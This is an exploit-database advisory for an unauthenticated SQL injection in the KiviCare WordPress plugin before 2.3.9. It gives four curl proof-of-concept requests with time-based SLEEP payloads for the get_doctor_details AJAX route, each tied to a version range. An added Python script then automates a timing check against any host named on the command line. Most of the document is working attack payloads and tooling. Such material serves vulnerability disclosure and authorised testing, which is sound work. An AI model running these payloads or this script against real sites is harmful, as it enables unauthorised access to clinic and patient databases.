wpexploit / cydave
WPEX-ID:53F493E9-273B-4349-8A59-F2207E8F8F30
History: May 23, 2022 - 12:00 a.m.

KiviCare < 2.3.9 - Unauthenticated SQLi

Published: 2022-05-23 00:00:00
Author: cydave
Tags: kivicare, sql injection, unauthenticated, exploit, version 2.3.9

EPSS: 0.04 (percentile 92.1%)

The plugin does not sanitise and escape some parameters before using them in SQL statements reached through the ajax_post AJAX action with the get_doctor_details route (the proofs of concept below reach the same route through both the ajax_post and ajax_get actions), leading to SQL injection exploitable by unauthenticated users.

Proof of concept, with at least one doctor created via the plugin (each payload delays the response by roughly five seconds when the injection succeeds; the headings give the version range each payload applies to):

v < 2.3.4
curl 'https://example.com/wp-admin/admin-ajax.php?action=ajax_post&route_name=get_doctor_details&clinic_id%5bid%5d=(CASE+WHEN+(4=4)+THEN+SLEEP(5)+ELSE+5+END)' --data ''

v < 2.3.5
curl 'https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"(CASE+WHEN+(4=4)+THEN+SLEEP(5)+ELSE+5+END)"%7D'

v < 2.3.6
curl 'https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)"%7D'

v <= 2.3.8
curl 'http://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b' 
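The following Python script is an added example, not code from the advisory, the plugin or its author: it rebuilds the four proof-of-concept requests above from their decoded parameters and runs a time-based check against a host you name, comparing a SLEEP(0) baseline with a SLEEP(delay) probe so that network latency does not produce false positives. The variant labels ("2.3.4" to "2.3.8", taken from the headings above), the one-second slack and the command-line interface are this example's own choices.

```python
"""Time-based blind SQLi check for KiviCare's get_doctor_details route.

Added example, not code from the advisory or the plugin. It rebuilds the
advisory's four PoC requests from their decoded parameters and compares
the response time of a SLEEP(0) baseline against a SLEEP(delay) probe.
The variant labels, the slack value and the CLI are choices made here.
"""
import argparse
import json
import time
import urllib.error
import urllib.parse
import urllib.request

AJAX_PATH = "/wp-admin/admin-ajax.php"


def case_sleep(delay):
    # Payload shape used by the advisory's "v < 2.3.4" and "v < 2.3.5" PoCs.
    return f"(CASE WHEN (4=4) THEN SLEEP({delay}) ELSE 5 END)"


def subselect_sleep(delay):
    # Payload shape used by the advisory's "v < 2.3.6" and "v <= 2.3.8" PoCs.
    return f"(SELECT 42 FROM (SELECT(SLEEP({delay})))b)"


def poc_params(variant, delay=5):
    """Return (decoded query parameters, HTTP method) for one PoC variant.

    variant is the upper bound from the advisory's headings: "2.3.4"
    (clinic_id[id], sent as POST), "2.3.5" and "2.3.6" (JSON-encoded
    clinic_id), "2.3.8" (props_doctor_id).
    """
    common = {"action": "ajax_get", "route_name": "get_doctor_details"}
    as_json = lambda obj: json.dumps(obj, separators=(",", ":"))  # no spaces, as in the PoCs
    if variant == "2.3.4":
        return {**common, "action": "ajax_post",
                "clinic_id[id]": case_sleep(delay)}, "POST"
    if variant == "2.3.5":
        return {**common, "clinic_id": as_json({"id": case_sleep(delay)})}, "GET"
    if variant == "2.3.6":
        return {**common,
                "clinic_id": as_json({"id": "1 AND " + subselect_sleep(delay)})}, "GET"
    if variant == "2.3.8":
        # The value is left without its final ")": the query's own closing
        # parenthesis completes the expression, exactly as in the advisory's PoC.
        return {**common, "clinic_id": as_json({"id": "1"}),
                "props_doctor_id": "1,2) AND (SELECT 42 FROM (SELECT(SLEEP(%d)))b" % delay}, "GET"
    raise ValueError(f"unknown variant {variant!r}")


def build_poc(base_url, variant, delay=5):
    """Full admin-ajax.php URL (query string URL-encoded) plus HTTP method."""
    params, method = poc_params(variant, delay)
    return base_url.rstrip("/") + AJAX_PATH + "?" + urllib.parse.urlencode(params), method


def looks_delayed(baseline_s, probe_s, delay, slack=1.0):
    """True when the probe took at least (delay - slack) seconds longer than the baseline."""
    return probe_s - baseline_s >= delay - slack


def timed_request(url, method, timeout):
    """Seconds until the response completes; HTTP 4xx/5xx still yield a timing."""
    req = urllib.request.Request(url, data=b"" if method == "POST" else None, method=method)
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
    except urllib.error.HTTPError:
        pass  # the server answered; the elapsed time is what matters here
    return time.monotonic() - start


def check_target(base_url, variant, delay=5, timeout=60):
    """Compare a SLEEP(0) baseline (best of two) with one SLEEP(delay) probe."""
    baseline_url, method = build_poc(base_url, variant, 0)
    probe_url, _ = build_poc(base_url, variant, delay)
    baseline = min(timed_request(baseline_url, method, timeout) for _ in range(2))
    probe = timed_request(probe_url, method, timeout)
    return {"variant": variant, "baseline_s": round(baseline, 2),
            "probe_s": round(probe, 2),
            "delayed": looks_delayed(baseline, probe, delay)}


if __name__ == "__main__":
    ap = argparse.ArgumentParser(description="KiviCare get_doctor_details time-based SQLi check")
    ap.add_argument("base_url", help="site root, e.g. https://example.com")
    ap.add_argument("--variant", choices=["2.3.4", "2.3.5", "2.3.6", "2.3.8"], default="2.3.8")
    ap.add_argument("--delay", type=int, default=5, help="seconds the probe should sleep")
    args = ap.parse_args()
    print(check_target(args.base_url, args.variant, args.delay))
```

Run it as `python3 kivicare_check.py https://example.com --variant 2.3.8` against a host you are authorised to test; a `delayed: True` result means the SLEEP(delay) probe took at least delay minus slack seconds longer than the SLEEP(0) baseline sent through the same injection point, which is the signal the curl commands above rely on. Only HTTP errors are swallowed; a connection failure or timeout propagates so that an unreachable host is not mistaken for a clean one.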

